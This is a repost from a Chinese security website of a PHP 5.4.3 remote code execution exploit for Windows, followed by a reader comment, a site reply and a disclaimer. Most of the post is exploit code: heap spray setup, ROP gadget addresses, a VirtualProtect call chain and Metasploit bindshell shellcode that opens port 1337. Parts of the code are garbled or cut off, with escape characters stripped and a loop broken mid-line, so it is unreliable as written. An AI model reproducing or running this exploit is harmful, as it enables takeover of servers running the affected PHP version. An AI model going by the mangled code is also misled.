PHP 5.4 (5.4.3) Code Execution (Win32)

2021年4月3日20:03:48评论44 views字数 969阅读3分13秒阅读模式

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)


===================
 offset-brute.html
===================


0day
PHP 5.4.3 0day by 0in & cOndis






===================
     0day.php
===================

 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); 

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN   [ole32.dll]
$spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); 

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

//  LPVOID lpAddress  = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize  = 0x01000000 
$spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect =  PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 
$spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out  PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C    ** [ADVAPI32.dll]
$spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4); 
// Ret Address = 0x048d0080 
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); 



$stacktrack = "xbcx0cxb0xc0x00"; 
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."x33xc9x83xe9xb0".
  "x81xc4xd0xfdxffxff".
  "xd9xeexd9x74x24xf4x5bx81x73x13x1d".
  "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
  "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
  "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
  "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
  "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
  "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
  "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
  "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
  "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
  "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
  "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
  "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
  "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
  "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
  "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
  "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
  "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
  "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
  "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
  "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
  "x4ex33xe4x96xcdxccx32x69";


$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); 
$fullspray="";
for($i=0;$i 102F3986   FF50 10          CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?>

留言评论（旧系统）：

【匿名者】 @ 2012-05-15 17:27:02

核大大，这个怎么用？

本站回复：

作者给了例子，offset-brute.html、0day.php，具体的看源码，看不懂你也用不了。　╮(╯_╰)╭

文章来源于lcx.cc:PHP 5.4 (5.4.3) Code Execution (Win32)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

PHP 5.4 (5.4.3) Code Execution (Win32)

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信